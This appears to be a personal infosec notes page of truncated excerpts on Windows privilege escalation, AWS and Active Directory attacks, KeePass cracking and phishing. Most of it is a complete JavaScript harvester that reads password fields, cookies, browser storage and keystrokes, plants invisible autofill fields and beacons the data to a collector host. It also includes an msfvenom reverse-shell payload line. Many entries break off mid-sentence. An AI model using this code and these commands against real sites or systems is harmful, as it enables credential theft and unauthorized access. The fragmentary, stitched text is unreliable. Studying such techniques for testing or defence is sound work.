Checklist: Good stuff:
CAINE can be used as a live system to perform a forensic examination of a machine (e.g. after an incident).
If the system is powered off: If the system is active: If the system is a VM: Other systems: Questions:
Get hidden content from password fields. Scenario: Use JavaScript for extraction. Copy and paste the following into the web browser's console: Extract keystrokes live from a browser. Scenario: Do: Extract cookies. Scenario: Inject/Do: Extract local / session storage. Like above: Stealing site passwords. Scenario: Then inject JS which adds an invisible user/username/name text field and…
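The collectors the post refers to (password-field values, live keystrokes, cookies, local/session storage and the invisible autofill field), as an added example that is not the original post's console snippets. Every function takes the document or Storage object as a parameter, so the same code can be pasted into a browser console or exercised against the constructed stand-in at the bottom; the collector URL is a hypothetical placeholder.

```javascript
// Added example, not the post's own snippets. Functions take doc/storage
// parameters so they run in a console and against the fake DOM below.

// Sink that smuggles a payload out via an image request (classic beacon).
// imageCtor is the browser's Image; leave it undefined outside a browser.
function makeBeaconSink(collectorUrl, imageCtor) {
  return (payload) => {
    const url = collectorUrl + '?d=' + encodeURIComponent(JSON.stringify(payload));
    if (imageCtor) new imageCtor().src = url; // fire-and-forget GET
    return url;
  };
}

// 1. Password fields: the value is readable from the DOM even though the
//    UI only renders dots.
function collectPasswordFields(doc) {
  return Array.from(doc.querySelectorAll('input[type="password"]'))
    .map((el) => ({ name: el.name || el.id || '', value: el.value }));
}

// 2. Live keystrokes: the handler batches keys and hands each batch to the sink.
function makeKeyLogger(sink, batchSize = 8) {
  const buffer = [];
  const flush = () => { if (buffer.length) sink({ keys: buffer.splice(0).join('') }); };
  const handler = (ev) => { buffer.push(ev.key); if (buffer.length >= batchSize) flush(); };
  return { handler, flush };
}

// 3. Cookies: document.cookie only exposes cookies WITHOUT the HttpOnly flag,
//    which is exactly why session cookies should carry it.
function parseCookies(cookieString) {
  const out = {};
  for (const part of cookieString.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue; // "flag" style entries without a value are skipped
    out[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return out;
}

// 4. localStorage / sessionStorage dump via the Storage interface.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// 5. Invisible username/password pair appended to a form so the browser's
//    password manager autofills it; the values are read back later.
function injectInvisibleLoginFields(doc, form) {
  const fields = {};
  for (const [name, type] of [['username', 'text'], ['password', 'password']]) {
    const el = doc.createElement('input');
    el.type = type;
    el.name = name;
    el.autocomplete = name === 'username' ? 'username' : 'current-password';
    el.style.opacity = '0';         // invisible, but not display:none,
    el.style.position = 'absolute'; // which autofill engines tend to skip
    form.appendChild(el);
    fields[name] = el;
  }
  return fields;
}

// Everything at once. In a browser console:
//   harvest(document, localStorage, sessionStorage,
//           makeBeaconSink('https://collector.example/c', Image))
function harvest(doc, localStore, sessionStore, sink) {
  const payload = {
    passwords: collectPasswordFields(doc),
    cookies: parseCookies(doc.cookie),
    localStorage: dumpStorage(localStore),
    sessionStorage: dumpStorage(sessionStore),
  };
  if (doc.forms && doc.forms.length) injectInvisibleLoginFields(doc, doc.forms[0]);
  const logger = makeKeyLogger(sink);
  if (typeof doc.addEventListener === 'function') doc.addEventListener('keydown', logger.handler);
  sink(payload);
  return payload;
}

// Constructed stand-in for a login page (sample data, not a real site).
function fakeLoginDocument() {
  const inputs = [
    { type: 'text', name: 'user', value: 'alice' },
    { type: 'password', name: 'pass', value: 'hunter2' },
  ];
  const form = { children: [], appendChild(el) { this.children.push(el); } };
  return {
    cookie: 'session=abc123; theme=dark; flag',
    forms: [form],
    listeners: {},
    querySelectorAll: (sel) =>
      sel === 'input[type="password"]' ? inputs.filter((i) => i.type === 'password') : inputs,
    createElement: (tag) => ({ tagName: tag.toUpperCase(), style: {} }),
    addEventListener(type, fn) { this.listeners[type] = fn; },
  };
}

// Constructed Storage-like object for offline runs.
function fakeStorage(entries) {
  const keys = Object.keys(entries);
  return { length: keys.length, key: (i) => keys[i], getItem: (k) => entries[k] };
}
```

Two practical caveats the code makes visible: `document.cookie` never returns HttpOnly cookies, so a missing session cookie in the dump is a sign the target did it right, and the autofill trick depends on the field being present in the DOM and not `display:none`, which is why opacity and absolute positioning are used instead.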
Pacu can be used to test an AWS account. Setup: Unauthorized enumeration. Requires only an AWS access key and secret key. Enumerate roles: create a list of possible role names to check, then run iam__enum_roles --word-list /tmp/roles.txt --account-id $accountId Enumerate users belonging to a (previously found) role: also create a list of possible user names, then run iam__enum_users --word-list…
Initial (network) enumeration. Check where a service is hosted by querying the nameserver records of the target domain: host -t ns $domain Get more information / confirmation via a whois query on a previously found domain: whois $previouslyFoundDomain Check where a host is running (forward, then reverse lookup): host $domain host $ipFromTheDomain Check more domains of this organisation / of…
Attacking Domain Controller Synchronization. The DRS (Directory Replication Service) is responsible for replicating a DC's data to multiple redundant DCs. Scenario: You own a user who has one of the following rights: Normally, users in the following groups have these (they could be configured otherwise, of course): You can check with the script in Basic Active Directory…
The four process UIDs. For each process, Linux manages four UIDs (real, effective, saved and filesystem UID). When a process is started/forked by a user with UID 1000, the new process normally also has UID 1000. With SUID/SGID binaries it becomes more complicated, since the process can get UIDs other than the caller's. When a process like passwd…
Enumeration in PowerShell. Caution: these commands work via RDP in an interactive session, but NOT in a non-privileged bind/WinRM shell. All services: PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName All running services: PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}…
Compile it natively or cross-compile it: x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll Restart the service / application somehow and check whether the new admin2 user now exists. Reflective DLL Injection: see https://github.com/stephenfewer/ReflectiveDLLInjection
Binary hijacking. Check whether a binary (e.g. one started by a service) is writeable:
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
                              NT AUTHORITY\SYSTEM:(F)
                              BUILTIN\Users:(F)
                              NT AUTHORITY\Authenticated Users:(RX)
Legend: (F) is full control, (RX) is read and execute. If a low-privileged group has write access (here BUILTIN\Users has F), replace the binary with a more useful executable, like this one. Compile it for the correct target architecture and replace the original file: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe Check this with one command:
Named pipes. A named pipe is a method for local or remote inter-process communication (IPC). Basic commands: Where is a program? where ssh Restart the system now: shutdown /r /t 0 Set file system attributes (shown by the dir command): attrib +r file.exe Set file system permissions (shown by the icacls command):…
The hash of the master password of a KeePass .kdbx file can be extracted with keepass2john Database.kdbx > keepass.hash Then crack it: /opt/hashcat/hashcat keepass.hash /opt/password_lists/rockyou.txt -m 13400 -r /opt/hashcat/rules/rockyou-30000.rule (!) If hashcat reports a salt/separator error, check whether the hash line starts with a username prefix like "user:". Remove it, or run hashcat with --username so it skips the prefix itself.
Short summary of techniques: Example of a manual in-memory injection. Create a reverse shell payload for PowerShell: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc Use this PowerShell script, which injects the shellcode into its own (PowerShell) process and executes it in a new thread: Start a listener and execute it in the victim's…
Get information from a (minified) JS (e.g. from Angular):
Files with the extension .Library-ms are similar to macOS's Volumes. They can contain files and directories which look like local files in Windows Explorer. Many AV / anti-malware products currently do not detect them. Create a Windows Library "directory". Preparation: Set up a WebDAV share reachable from the victim's system which points to a…
Short: A user opens a link (e.g. from a phishing email) which carries an injection in the URL; it is executed on the site as long as the user is logged in. See also the command injections post. Classes: Tip:
See also the Web brute force post.
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
Upgrade a non-interactive shell to a TTY (Python 2 and Python 3):
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'